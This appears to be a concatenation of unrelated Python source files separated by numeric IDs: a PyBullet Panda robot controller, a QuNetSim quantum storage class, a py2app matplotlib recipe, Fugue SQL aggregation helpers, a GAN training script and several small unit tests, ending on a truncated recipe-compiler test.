def traj_tracking_vel(self, targetPos, targetQuat, posGain=20, velGain=5):
eePos, eeQuat = self._panda.get_ee()
eePosError = targetPos - eePos
eeOrnError = log_rot(quat2rot(targetQuat).dot((quat2rot(eeQuat).T))) # in spatial frame
jointPoses = self._panda.get_arm_joints() + [0,0,0] # add fingers
eeState = p.getLinkState(self._pandaId,
self._panda.pandaEndEffectorLinkIndex,
computeLinkVelocity=1,
computeForwardKinematics=1)
# Get the Jacobians for the CoM of the end-effector link. Note that in this example com_rot = identity, and we would need to use com_rot.T * com_trn. The localPosition is always defined in terms of the link frame coordinates.
zero_vec = [0.0] * len(jointPoses)
jac_t, jac_r = p.calculateJacobian(self._pandaId,
self._panda.pandaEndEffectorLinkIndex,
eeState[2],
jointPoses,
zero_vec,
zero_vec) # use localInertialFrameOrientation
jac_sp = full_jacob_pb(jac_t, jac_r)[:, :7] # 6x10 -> 6x7, ignore last three columns
try:
jointDot = np.linalg.pinv(jac_sp).dot((np.hstack((posGain*eePosError, velGain*eeOrnError)).reshape(6,1))) # pseudo-inverse
except np.linalg.LinAlgError:
jointDot = np.zeros((7,1))
return jointDot
############################### Contact ##################################
def get_contact(self, objId, minForceThres=1e-1):
left_contacts = p.getContactPoints(self._pandaId,
objId,
linkIndexA=self._panda.pandaLeftFingerLinkIndex,
linkIndexB=-1)
right_contacts = p.getContactPoints(self._pandaId,
objId,
linkIndexA=self._panda.pandaRightFingerLinkIndex,
linkIndexB=-1)
left_contacts = [i for i in left_contacts if i[9] > minForceThres]
right_contacts = [i for i in right_contacts if i[9] > minForceThres]
return left_contacts, right_contacts
def get_finger_force(self, objId):
left_contacts, right_contacts = self.get_contact(objId)
left_force = np.zeros((3))
right_force = np.zeros((3))
for i in left_contacts:
left_force += i[9]*np.array(i[7])+i[10]*np.array(i[11])+i[12]*np.array(i[13])
for i in right_contacts:
right_force += i[9]*np.array(i[7])+i[10]*np.array(i[11])+i[12]*np.array(i[13])
leftNormalMag = sum([i[9] for i in left_contacts])
rightNormalMag = sum([i[9] for i in right_contacts])
numLeftContact = len(left_contacts)
numRightContact = len(right_contacts)
if numLeftContact < 1 or numRightContact < 1:
return None
else:
return left_force, right_force, \
np.array(left_contacts[0][6]), np.array(right_contacts[0][6]), \
leftNormalMag, rightNormalMag
def check_hold_object(self, objId, minForceThres=10.0):
left_contacts, right_contacts = self.get_contact(objId)
leftNormalMag = sum([i[9] for i in left_contacts])
rightNormalMag = sum([i[9] for i in right_contacts])
return leftNormalMag > minForceThres and rightNormalMag > minForceThres
def check_contact(self, objId, both=False):
leftContacts, rightContacts = self.get_contact(objId)
if both:
if len(leftContacts) > 0 and len(rightContacts) > 0:
return 1
else:
if len(leftContacts) > 0 or len(rightContacts) > 0:
return 1
return 0
def check_palm_contact(self, objId, minForceThres=1e-1):
palm_contacts = p.getContactPoints(self._pandaId,
objId,
linkIndexA=self._panda.pandaHandLinkIndex,
linkIndexB=-1)
palm_contacts = [i for i in palm_contacts if i[9] > minForceThres]
return len(palm_contacts) > 0
############################### Info ##################################
def get_ee(self):
return self._panda.get_ee()
def get_gripper_tip_long(self):
return self._panda.get_gripper_tip_long()
def get_arm_joints(self):
return self._panda.get_arm_joints()
def get_gripper_joint(self):
return self._panda.get_gripper_joint()
def get_left_finger(self):
return self._panda.get_left_finger()
def get_right_finger(self):
return self._panda.get_right_finger()
def get_obs(self):
return self._panda.get_obs()
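# --- Minimal usage sketch (added for illustration; assumes a local PyBullet
# --- install and that src.panda.Panda can load its URDF as shown above). ---
if __name__ == '__main__':
    p.connect(p.DIRECT)                      # headless physics server
    env = pandaEnv(mu=0.3, sigma=0.01)
    env.reset_env()
    ee_pos, ee_quat = env.get_ee()
    # Move the end effector 5 cm straight up while holding its orientation.
    env.move_pos(absolute_pos=np.array(ee_pos) + np.array([0., 0., 0.05]),
                 absolute_global_quat=ee_quat, numSteps=100)
    print('EE pose:', env.get_ee())
    p.disconnect()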
|
23198
|
from qunetsim.backends.rw_lock import RWLock
from qunetsim.objects.logger import Logger
import queue
class QuantumStorage(object):
"""
An object which stores qubits.
"""
STORAGE_LIMIT_ALL = 1
STORAGE_LIMIT_PER_HOST = 2
STORAGE_LIMIT_INDIVIDUALLY_PER_HOST = 3
def __init__(self):
# _host_dict stores host_id -> array with qubits of the host.
self._host_dict = {}
# _qubit_dict stores qubit_id -> dict Host_id -> Qubit objects with this id.
self._qubit_dict = {}
# _purpose_dict stores qubit_id -> dict Host_id -> Purpose belonging to
# the Qubit with the same Host and ID.
self._purpose_dict = {}
self._storage_mode = QuantumStorage.STORAGE_LIMIT_INDIVIDUALLY_PER_HOST
self._storage_limits_per_host = {}
self._amount_qubits_stored_per_host = {}
self._default_storage_limit_per_host = -1
self._storage_limit = -1
self._amount_qubit_stored = 0
# read write lock, for threaded access
self.lock = RWLock()
self.logger = Logger.get_instance()
# for tracking pending requests
# dictionary tracks the request made by a pending request.
self._pending_request_dict = {}
# Determines a unique ID for a pending request.
self._request_id = 0
# Amount of pending requests
self._amount_pending_requests = 0
def __str__(self):
out = ""
out += "Quantum storage with the properties:\nstorage mode: %d\nstorage limit: %d\n" % (
self._storage_mode, self._storage_limit)
out += "Host dictionary is:\n"
out += "; ".join([str(key) + ":" + str([v.id for v in value])
for key, value in self._host_dict.items()])
out += "\n"
out += "Qubit dictionary is:\n"
out += "; ".join([str(key) + ":" + str(value)
for key, value in self._qubit_dict.items()])
out += "\n"
out += "Purpose dictionary is:\n"
out += "; ".join([str(key) + ":" + str(value)
for key, value in self._purpose_dict.items()])
out += "\n"
return out
@property
def storage_limit(self):
return self._storage_limit
@storage_limit.setter
def storage_limit(self, new_limit):
"""
        Set a new storage limit for the storage. The implementation depends on
        the storage mode.
Args:
new_limit (int): The new max amount of qubit.
"""
if self._storage_mode == QuantumStorage.STORAGE_LIMIT_ALL:
self._storage_limit = new_limit
elif self._storage_mode == QuantumStorage.STORAGE_LIMIT_PER_HOST:
self._storage_limit = new_limit
elif self._storage_mode == QuantumStorage.STORAGE_LIMIT_INDIVIDUALLY_PER_HOST:
self._default_storage_limit_per_host = new_limit
for id_ in list(self._storage_limits_per_host):
self._storage_limits_per_host[id_] = new_limit
else:
raise ValueError(
"Internal Value Error, this storage mode does not exist.")
@property
def storage_limit_mode(self):
return self._storage_mode
@storage_limit_mode.setter
def storage_limit_mode(self, new_mode):
self._storage_mode = new_mode
@property
def amount_qubits_stored(self):
return self._amount_qubit_stored
def amount_qubits_stored_with_host(self, host_id):
return self._amount_qubits_stored_per_host[host_id]
def set_storage_limit_with_host(self, new_limit, host_id):
"""
        Set a new storage limit for the storage. The implementation depends on
        the storage mode.
Args:
new_limit (int): The new max amount of qubit.
host_id (str): optional, if given, and the storage mode is
STORAGE_LIMIT_INDIVIDUALLY_PER_HOST, the limit is only
set for this specific host.
"""
if self._storage_mode == QuantumStorage.STORAGE_LIMIT_INDIVIDUALLY_PER_HOST:
if host_id is None:
raise ValueError(
"Host ID must be given in this storage mode")
else:
self._storage_limits_per_host[host_id] = new_limit
else:
raise ValueError(
"Internal Value Error, this storage mode does not exist.")
def reset_storage(self):
"""
Reset the quantum storage.
"""
for host in self._host_dict:
self.reset_qubits_from_host(host)
def release_storage(self):
"""
Releases all qubits in this storage. The storage is not
usable anymore after this function has been called.
"""
self.lock.acquire_write()
for q in self._qubit_dict.values():
for ele in q.values():
ele.release()
# do not release write, storage not usable anymore
def check_qubit_from_host_exists(self, from_host_id, purpose=None):
"""
Check if a qubit from a host exists in this quantum storage.
Args:
from_host_id (str): The host id of the host from which the qubit is from.
purpose (int): Optional, purpose of the qubit which should exist.
Returns:
(bool): True, if such a qubit is in the storage, false if not.
"""
self.lock.acquire_write()
if from_host_id not in self._host_dict:
self.lock.release_write()
return False
for q in self._host_dict[from_host_id]:
if self._check_qubit_in_system(q, from_host_id, purpose):
self.lock.release_write()
return True
self.lock.release_write()
return False
def get_qubit_by_id(self, q_id):
"""
Return the qubit that has the id *q_id*
Args:
q_id (str): The ID of the qubit
Returns:
(Qubit): The qubit with the id *q_id* or None if it does not exist
"""
if q_id in self._qubit_dict:
return list(self._qubit_dict[q_id].values())[0]
return None
def change_qubit_id(self, from_host_id, new_id, old_id=None):
"""
Changes the ID of a qubit. If the ID is not given, a random
qubit which is from a host is changed to the new id.
Args:
from_host_id (str): The ID of the owner
new_id (str): The ID to change to
old_id (str): The old ID
Returns:
(str): The new ID
"""
new_id = str(new_id)
self.lock.acquire_write()
if old_id is not None:
old_id = str(old_id)
qubit, purpose = self._pop_qubit_with_id_and_host_from_qubit_dict(
old_id, from_host_id)
if qubit is not None:
qubit.id = new_id
self._add_qubit_to_qubit_dict(qubit, purpose, from_host_id)
else:
if from_host_id in self._host_dict and self._host_dict[from_host_id]:
qubit = self._host_dict[from_host_id][0]
old_id = qubit.id
_, purpose = self._pop_qubit_with_id_and_host_from_qubit_dict(
old_id, from_host_id)
qubit.id = new_id
self._add_qubit_to_qubit_dict(qubit, purpose, from_host_id)
self.lock.release_write()
return old_id
def add_qubit_from_host(self, qubit, purpose, from_host_id):
"""
Adds a qubit which has been received from a host.
Args:
qubit (Qubit): qubit which should be stored.
from_host_id (str): Id of the Host from whom the qubit has
been received.
purpose (str): Purpose of the Qubit, for example EPR or data.
"""
self.lock.acquire_write()
if self._check_qubit_in_system(qubit, from_host_id, purpose=purpose):
self.logger.log("Qubit with id %s, purpose %s and from host %s"
" already in storage" % (qubit.id, purpose, from_host_id))
raise ValueError("Qubit with these parameters already in storage!")
if from_host_id not in self._host_dict:
self._add_new_host(from_host_id)
if not self._increase_qubit_counter(from_host_id):
qubit.release()
self.lock.release_write()
return
self._host_dict[from_host_id].append(qubit)
self._add_qubit_to_qubit_dict(qubit, purpose, from_host_id)
# Check if a Qubit of one of the callbacks has arrived
self._check_all_requests()
self.lock.release_write()
def get_all_qubits_from_host(self, from_host_id, purpose=None, remove=False):
"""
Get all Qubits from a specific host id.
        By default these qubits are not removed from storage; pass remove=True
        to also remove them.
Args:
from_host_id (str): The host who the qubits are from
purpose (int): The purpose of the qubits
remove (bool): Also remove from storage
Returns:
(list): The list of qubits
"""
if from_host_id in self._host_dict:
out = []
self.lock.acquire_write()
flag = False
for q in self._host_dict[from_host_id]:
if self._check_qubit_in_system(q, from_host_id, purpose):
if not remove:
out.append(q)
else:
flag = True
if remove:
break
if not flag and remove:
num_qubits = len(self._host_dict[from_host_id])
for _ in range(num_qubits):
out.append(self._get_qubit_from_host(from_host_id, purpose=purpose))
self.lock.release_write()
return out
return []
def reset_qubits_from_host(self, from_host_id, purpose=None):
"""
Remove all stored qubits from the host *from_host_id*.
Args:
from_host_id (str): The host who the qubits are from
purpose (int):
"""
self.lock.acquire_write()
if from_host_id in self._host_dict:
for q in self._host_dict[from_host_id]:
if self._check_qubit_in_system(q, from_host_id, purpose):
self._get_qubit_from_host(from_host_id, purpose=purpose)
self.lock.release_write()
def _check_all_requests(self):
"""
Checks if any of the pending requests is now fulfilled.
Returns:
If a request is fulfilled, the request is handled and the function
returns the qubit of this request.
"""
for req_id, args in self._pending_request_dict.items():
ret = self._get_qubit_from_host(args[1], args[2], args[3])
if ret is not None:
args[0].put(ret)
self._remove_request(req_id)
return ret
def _add_request(self, args):
"""
Adds a new request to the quantum storage. If a new qubit arrives, it
is checked if the request for the qubit is satisfied.
Args:
args (list): [Queue, from_host_id, q_id, purpose]
"""
        req_id = self._request_id
        self._pending_request_dict[req_id] = args
        self._request_id += 1
        self._amount_pending_requests += 1
        return req_id
def _remove_request(self, req_id):
"""
Removes a pending request from the request dict.
Args:
req_id (int): The id of the request to remove.
"""
if req_id in self._pending_request_dict:
del self._pending_request_dict[req_id]
self._amount_pending_requests -= 1
def get_qubit_from_host(self, from_host_id, q_id=None, purpose=None, wait=0):
"""
        Returns the next qubit which has been received from a host. If the qubit
        has not been received yet, the thread blocks for at most *wait* seconds
        until the qubit arrives (the default is 0). If an id is given, the exact
        qubit with that id is returned, or None if it does not exist.
        The qubit is removed from the quantum storage.
        Args:
            from_host_id (str): Host id from whom the qubit has been received.
            q_id (str): Optional id, to return the exact qubit with this id.
            purpose (str): Optional, purpose of the qubit.
            wait (int): The maximum blocking time in seconds. Default is 0; -1 blocks forever.
        Returns:
            (Qubit): The qubit if such a qubit exists, otherwise None.
"""
# Block forever if wait is -1
if wait == -1:
wait = None
self.lock.acquire_write()
ret = self._get_qubit_from_host(from_host_id, q_id, purpose)
if ret is not None or wait == 0:
self.lock.release_write()
return ret
q = queue.Queue()
args = [q, from_host_id, q_id, purpose]
req_id = self._add_request(args)
self.lock.release_write()
ret = None
try:
ret = q.get(timeout=wait)
except queue.Empty:
pass
if ret is None:
self.lock.acquire_write()
self._remove_request(req_id)
self.lock.release_write()
return ret
def _get_qubit_from_host(self, from_host_id, q_id=None, purpose=None):
if q_id is not None:
qubit = self._pop_qubit_with_id_and_host_from_qubit_dict(
q_id, from_host_id, purpose=purpose)
if qubit is not None:
qubit, purp = qubit
if from_host_id not in self._host_dict or \
qubit not in self._host_dict[from_host_id]:
# Qubit with the ID exists, but does not belong to the host requested
self._add_qubit_to_qubit_dict(qubit, purp, from_host_id)
return None
self._host_dict[from_host_id].remove(qubit)
self._decrease_qubit_counter(from_host_id)
return qubit
if from_host_id not in self._host_dict:
return None
if self._host_dict[from_host_id]:
# check purposes of all qubits
for _ in range(len(self._host_dict[from_host_id])):
qubit = self._host_dict[from_host_id].pop(0)
out = self._pop_qubit_with_id_and_host_from_qubit_dict(
qubit.id, from_host_id, purpose=purpose)
if out is not None:
self._decrease_qubit_counter(from_host_id)
return out[0]
self._host_dict[from_host_id].append(qubit)
return None
def _pop_qubit_with_id_and_host_from_qubit_dict(self, q_id, from_host_id, purpose=None):
def _pop_purpose_from_purpose_dict():
nonlocal q_id, from_host_id
if q_id not in self._purpose_dict:
return None
pur = self._purpose_dict[q_id].pop(from_host_id, None)
if pur is not None:
if not self._purpose_dict[q_id]:
del self._purpose_dict[q_id]
return pur
return None
purp = _pop_purpose_from_purpose_dict()
if purp is not None:
if purpose is None or purpose == purp:
qubit = self._qubit_dict[q_id].pop(from_host_id, None)
if qubit is not None:
if not self._qubit_dict[q_id]:
del self._qubit_dict[q_id]
return qubit, purp
else:
if q_id not in self._purpose_dict:
self._purpose_dict[q_id] = {}
self._purpose_dict[q_id][from_host_id] = purp
return None
def _add_qubit_to_qubit_dict(self, qubit, purpose, from_host_id):
def _add_purpose_to_purpose_dict(q_id):
nonlocal purpose, from_host_id
if q_id not in self._purpose_dict:
self._purpose_dict[q_id] = {}
self._purpose_dict[q_id][from_host_id] = purpose
if qubit.id not in self._qubit_dict:
self._qubit_dict[qubit.id] = {}
self._qubit_dict[qubit.id][from_host_id] = qubit
_add_purpose_to_purpose_dict(qubit.id)
def _add_new_host(self, host_id):
if host_id not in self._host_dict:
self._host_dict[host_id] = []
if host_id not in self._storage_limits_per_host:
self._storage_limits_per_host[host_id] = self._default_storage_limit_per_host
self._amount_qubits_stored_per_host[host_id] = 0
def _check_qubit_in_system(self, qubit, from_host_id, purpose=None):
"""
        True if a qubit with the same parameters is already in the system.
Args:
qubit (Qubit): The qubit in question
from_host_id (str): The ID of the sending host
purpose (int): Qubit's purpose
Returns:
(bool): If the qubit is in the system.
"""
if qubit.id in self._qubit_dict and \
from_host_id in self._qubit_dict[qubit.id]:
if purpose is None or (purpose == self._purpose_dict[qubit.id][from_host_id]):
return True
return False
def _check_memory_limits(self, host_id):
"""
Checks if another qubit can be added to the storage.
Args:
host_id (str): The host_id the qubit should be added to.
Returns:
True if no storage limit has been reached, False if a memory
limit has occurred.
"""
if self._storage_mode == QuantumStorage.STORAGE_LIMIT_ALL:
if self._storage_limit == -1:
return True
if self._storage_limit <= self._amount_qubit_stored:
return False
else:
return True
elif self._storage_mode == QuantumStorage.STORAGE_LIMIT_PER_HOST:
if self._storage_limit == -1:
return True
if self._storage_limit <= self._amount_qubits_stored_per_host[host_id]:
return False
else:
return True
elif self._storage_mode == QuantumStorage.STORAGE_LIMIT_INDIVIDUALLY_PER_HOST:
if self._storage_limits_per_host[host_id] == -1:
return True
if self._storage_limits_per_host[host_id] <= self._amount_qubits_stored_per_host[host_id]:
return False
else:
return True
else:
raise ValueError(
"Internal Value Error, this storage mode does not exist.")
def _increase_qubit_counter(self, host_id):
"""
Checks if the qubit counter can be increased, because of memory limits,
and increases the counter.
Args:
            host_id (str): The host the qubit comes from.
Returns:
True, if the counter could be increased, False if not.
"""
if not self._check_memory_limits(host_id):
return False
self._amount_qubits_stored_per_host[host_id] += 1
self._amount_qubit_stored += 1
return True
def _reset_qubit_counter(self, host_id):
"""
Args:
host_id (str):
Returns:
(bool): True, if the counter could be decreased, False if not.
"""
if self._amount_qubits_stored_per_host[host_id] <= 0 or \
self._amount_qubit_stored <= 0:
return False
        num_qubits = self._amount_qubits_stored_per_host[host_id]
        self._amount_qubits_stored_per_host[host_id] = 0
        self._amount_qubit_stored -= num_qubits
        return True
def _decrease_qubit_counter(self, host_id):
"""
Checks if the qubit counter can be decreased
and decreases the counter.
Args:
            host_id (str): The host the qubit comes from.
Returns:
(bool): True, if the counter could be decreased, False if not.
"""
if self._amount_qubits_stored_per_host[host_id] <= 0 or \
self._amount_qubit_stored <= 0:
return False
self._amount_qubits_stored_per_host[host_id] -= 1
self._amount_qubit_stored -= 1
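# Illustrative usage sketch for the blocking API above. `storage` is assumed to
# be an already initialised QuantumStorage instance and 'Alice' a hypothetical
# host id that has stored qubits in it; neither is defined in this module.
def _example_blocking_receive(storage, from_host_id='Alice'):
    # Block for at most two seconds; None means the timeout expired and the
    # pending request was removed again.
    qubit = storage.get_qubit_from_host(from_host_id, wait=2)
    if qubit is not None:
        # The qubit has been taken out of storage together with its purpose entry.
        return qubit
    return None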
|
23220
|
import os
def check(cmd, mf):
m = mf.findNode('matplotlib')
if m is None or m.filename is None:
return None
if cmd.matplotlib_backends:
backends = {}
for backend in cmd.matplotlib_backends:
if backend == '-':
pass
elif backend == '*':
mf.import_hook('matplotlib.backends', m, ['*'])
else:
mf.import_hook('matplotlib.backends.backend_%s' % (
backend,), m)
else:
backends = {'packages': ['matplotlib']}
return dict(
prescripts=['py2app.recipes.matplotlib_prescript'],
resources=[os.path.join(os.path.dirname(m.filename), 'mpl-data')],
**backends
)
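# Hypothetical setup.py fragment showing how the backend selection above is
# typically driven; '-' keeps matplotlib backends out of the bundle and '*'
# pulls in everything under matplotlib.backends. The script name, backend and
# option spelling below are assumptions, not part of this recipe.
#
#   from setuptools import setup
#   setup(
#       app=['main.py'],
#       options={'py2app': {'matplotlib_backends': ['tkagg']}},
#   )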
|
23271
|
import os
import nibabel as nb
import numpy as np
from django.test import TestCase
from neurovault.apps.statmaps.models import BaseStatisticMap
from neurovault.apps.statmaps.utils import is_thresholded, infer_map_type
class QATest(TestCase):
def setUp(self):
this_path = os.path.abspath(os.path.dirname(__file__))
self.brain = nb.load(os.path.join(this_path, "../static", "anatomical", "MNI152.nii.gz"))
self.roi_map = nb.load(os.path.join(this_path, "test_data", "statmaps", "WA3.nii.gz"))
self.parcellation = nb.load(os.path.join(this_path, "test_data", "TTatlas.nii.gz"))
# We will fill in brain mask with this percentage of randomly placed values
self.ratios = [0.0,0.1,0.15,0.2,0.25,0.3,0.4,0.5,0.6,0.96, 0.98]
self.thresholded = [False,False,False,False,False,False,False,False,False,True,True]
def testThresholded(self):
for p,t in zip(self.ratios, self.thresholded):
empty_data = np.ones(self.brain.shape)
if p != 0.0:
number_voxels = int(np.floor(p * empty_data.size))
random_idx = np.random.choice(range(empty_data.size), number_voxels, replace=False)
empty_data[np.unravel_index(random_idx, empty_data.shape)] = 0
empty_nii = nb.Nifti1Image(empty_data,affine=self.brain.get_affine(),header=self.brain.get_header())
is_thr, ratio_bad = is_thresholded(nii_obj=empty_nii)
print "Zeroed %s of values, is_thresholded returns [%s:%s]" %(p,is_thr,ratio_bad)
self.assertAlmostEqual(p, ratio_bad, delta=0.001)
self.assertEquals(t, is_thr)
def testInferMapType(self):
self.assertEquals(infer_map_type(self.roi_map), BaseStatisticMap.R)
self.assertEquals(infer_map_type(self.parcellation), BaseStatisticMap.Pa)
self.assertEquals(infer_map_type(self.brain), BaseStatisticMap.OTHER)
|
23273
|
from typing import Any, Optional
import pyarrow as pa
from fugue.column.expressions import (
ColumnExpr,
_FuncExpr,
_to_col,
function,
)
from triad import Schema
def coalesce(*args: Any) -> ColumnExpr:
"""SQL ``COALESCE`` function
:param args: If a value is not :class:`~fugue.column.expressions.ColumnExpr`
then it's converted to a literal column by
:func:`~fugue.column.expressions.col`
.. note::
this function can infer neither type nor alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
f.coalesce(col("a"), col("b")+col("c"), 1)
"""
return function("COALESCE", *[_to_col(x) for x in args])
def min(col: ColumnExpr) -> ColumnExpr: # pylint: disable=redefined-builtin
"""SQL ``MIN`` function (aggregation)
:param col: the column to find min
.. note::
* this function can infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
# assume col a has type double
f.min(col("a")) # CAST(MIN(a) AS double) AS a
f.min(-col("a")) # CAST(MIN(-a) AS double) AS a
# neither type nor alias can be inferred in the following cases
f.min(col("a")+1)
f.min(col("a")+col("b"))
# you can specify explicitly
# CAST(MIN(a+b) AS int) AS x
f.min(col("a")+col("b")).cast(int).alias("x")
"""
assert isinstance(col, ColumnExpr)
return _SameTypeUnaryAggFuncExpr("MIN", col)
def max(col: ColumnExpr) -> ColumnExpr: # pylint: disable=redefined-builtin
"""SQL ``MAX`` function (aggregation)
:param col: the column to find max
.. note::
* this function can infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
# assume col a has type double
f.max(col("a")) # CAST(MAX(a) AS double) AS a
f.max(-col("a")) # CAST(MAX(-a) AS double) AS a
# neither type nor alias can be inferred in the following cases
f.max(col("a")+1)
f.max(col("a")+col("b"))
# you can specify explicitly
# CAST(MAX(a+b) AS int) AS x
f.max(col("a")+col("b")).cast(int).alias("x")
"""
assert isinstance(col, ColumnExpr)
return _SameTypeUnaryAggFuncExpr("MAX", col)
def count(col: ColumnExpr) -> ColumnExpr:
"""SQL ``COUNT`` function (aggregation)
:param col: the column to find count
.. note::
* this function cannot infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
f.count(col("*")) # COUNT(*)
f.count(col("a")) # COUNT(a) AS a
# you can specify explicitly
# CAST(COUNT(a) AS double) AS a
f.count(col("a")).cast(float)
"""
assert isinstance(col, ColumnExpr)
return _UnaryAggFuncExpr("COUNT", col)
def count_distinct(col: ColumnExpr) -> ColumnExpr:
"""SQL ``COUNT DISTINCT`` function (aggregation)
:param col: the column to find distinct element count
.. note::
* this function cannot infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
f.count_distinct(col("*")) # COUNT(DISTINCT *)
f.count_distinct(col("a")) # COUNT(DISTINCT a) AS a
# you can specify explicitly
# CAST(COUNT(DISTINCT a) AS double) AS a
f.count_distinct(col("a")).cast(float)
"""
assert isinstance(col, ColumnExpr)
return _UnaryAggFuncExpr("COUNT", col, arg_distinct=True)
def avg(col: ColumnExpr) -> ColumnExpr:
"""SQL ``AVG`` function (aggregation)
:param col: the column to find average
.. note::
* this function cannot infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
f.avg(col("a")) # AVG(a) AS a
# you can specify explicitly
# CAST(AVG(a) AS double) AS a
f.avg(col("a")).cast(float)
"""
assert isinstance(col, ColumnExpr)
return _UnaryAggFuncExpr("AVG", col)
def sum(col: ColumnExpr) -> ColumnExpr: # pylint: disable=redefined-builtin
"""SQL ``SUM`` function (aggregation)
:param col: the column to find sum
.. note::
* this function cannot infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
f.sum(col("a")) # SUM(a) AS a
# you can specify explicitly
# CAST(SUM(a) AS double) AS a
f.sum(col("a")).cast(float)
"""
assert isinstance(col, ColumnExpr)
return _UnaryAggFuncExpr("SUM", col)
def first(col: ColumnExpr) -> ColumnExpr:
"""SQL ``FIRST`` function (aggregation)
:param col: the column to find first
.. note::
* this function can infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
# assume col a has type double
f.first(col("a")) # CAST(FIRST(a) AS double) AS a
f.first(-col("a")) # CAST(FIRST(-a) AS double) AS a
# neither type nor alias can be inferred in the following cases
f.first(col("a")+1)
f.first(col("a")+col("b"))
# you can specify explicitly
# CAST(FIRST(a+b) AS int) AS x
f.first(col("a")+col("b")).cast(int).alias("x")
"""
assert isinstance(col, ColumnExpr)
return _SameTypeUnaryAggFuncExpr("FIRST", col)
def last(col: ColumnExpr) -> ColumnExpr:
"""SQL ``LAST`` function (aggregation)
:param col: the column to find last
.. note::
* this function can infer type from ``col`` type
* this function can infer alias from ``col``'s inferred alias
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
# assume col a has type double
f.last(col("a")) # CAST(LAST(a) AS double) AS a
f.last(-col("a")) # CAST(LAST(-a) AS double) AS a
# neither type nor alias can be inferred in the following cases
f.last(col("a")+1)
f.last(col("a")+col("b"))
# you can specify explicitly
# CAST(LAST(a+b) AS int) AS x
f.last(col("a")+col("b")).cast(int).alias("x")
"""
assert isinstance(col, ColumnExpr)
return _SameTypeUnaryAggFuncExpr("LAST", col)
def is_agg(column: Any) -> bool:
"""Check if a column contains aggregation operation
:param col: the column to check
:return: whether the column is :class:`~fugue.column.expressions.ColumnExpr`
and contains aggregation operations
.. admonition:: New Since
:class: hint
**0.6.0**
.. admonition:: Examples
.. code-block:: python
import fugue.column.functions as f
assert not f.is_agg(1)
assert not f.is_agg(col("a"))
assert not f.is_agg(col("a")+lit(1))
assert f.is_agg(f.max(col("a")))
assert f.is_agg(-f.max(col("a")))
assert f.is_agg(f.max(col("a")+1))
assert f.is_agg(f.max(col("a"))+f.min(col("a"))))
"""
if isinstance(column, _UnaryAggFuncExpr):
return True
if isinstance(column, _FuncExpr):
return any(is_agg(x) for x in column.args) or any(
is_agg(x) for x in column.kwargs.values()
)
return False
class _UnaryAggFuncExpr(_FuncExpr):
def __init__(self, func: str, col: ColumnExpr, arg_distinct: bool = False):
super().__init__(func, col, arg_distinct=arg_distinct)
def infer_alias(self) -> ColumnExpr:
return (
self
if self.output_name != ""
else self.alias(self.args[0].infer_alias().output_name)
)
def _copy(self) -> _FuncExpr:
return _UnaryAggFuncExpr(self.func, *self.args, **self.kwargs)
class _SameTypeUnaryAggFuncExpr(_UnaryAggFuncExpr):
def _copy(self) -> _FuncExpr:
return _SameTypeUnaryAggFuncExpr(self.func, *self.args, **self.kwargs)
def infer_type(self, schema: Schema) -> Optional[pa.DataType]:
return self.as_type or self.args[0].infer_type(schema)
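# Quick sketch of how the helpers above compose: is_agg walks nested _FuncExpr
# arguments recursively, so any expression wrapping an aggregation reports True.
# `col` and `lit` are assumed to be importable from fugue.column, as in the
# docstring examples above.
#
#   from fugue.column import col, lit
#   assert is_agg(min(col("a")) + lit(1))    # the sum contains a MIN aggregation
#   assert not is_agg(col("a") + lit(1))     # plain arithmetic, no aggregation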
|
23285
|
import unittest
from minos.common import (
MinosException,
)
from minos.networks import (
MinosNetworkException,
)
class TestExceptions(unittest.TestCase):
def test_type(self):
self.assertTrue(issubclass(MinosNetworkException, MinosException))
if __name__ == "__main__":
unittest.main()
|
23288
|
import os
import numpy as np
import tensorflow as tf
from models.config import Config
from models.memory_gan import MemoryGAN
from models.test_generation import test_generation
from models.train import train
from utils import pp, visualize, to_json
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
flags = tf.app.flags
flags.DEFINE_integer("epoch", 1500, "Max epoch to train")
flags.DEFINE_string("exp", 0, "Experiment number")
flags.DEFINE_string("load_cp_dir", '', "cp path")
flags.DEFINE_string("dataset", "fashion", "[fashion, affmnist, cifar10]")
flags.DEFINE_string("loss", "jsd", "[jsd, alternative, reverse_kl, updown]")
flags.DEFINE_boolean("lr_decay", False, "")
flags.DEFINE_boolean("use_augmentation", False, "")
flags.DEFINE_boolean("is_train", True, "True for training, False for testing [False]")
flags.DEFINE_string("model", 'MemoryGAN', '')
flags.DEFINE_string("generator", 'base_g', '')
flags.DEFINE_string("discriminator", 'memory_d', '')
FLAGS = flags.FLAGS
def main(_):
pp.pprint(flags.FLAGS.__flags)
config = Config(FLAGS)
config.print_config()
config.make_dirs()
config_proto = tf.ConfigProto(allow_soft_placement=FLAGS.is_train, log_device_placement=False)
config_proto.gpu_options.allow_growth = True
with tf.Session(config=config_proto) as sess:
model = globals()[FLAGS.model](config)
if not FLAGS.is_train:
test_generation(model, sess)
else:
train(model, sess)
if __name__ == '__main__':
tf.app.run()
|
23304
|
from recipe_compiler.recipe import Recipe
from recipe_compiler.recipe_category import RecipeCategory
def test_recipe_slug():
# Given
name = "<NAME>"
residence = "Seattle, WA"
category = RecipeCategory("dessert")
recipe_name = '"Pie" Shell Script'
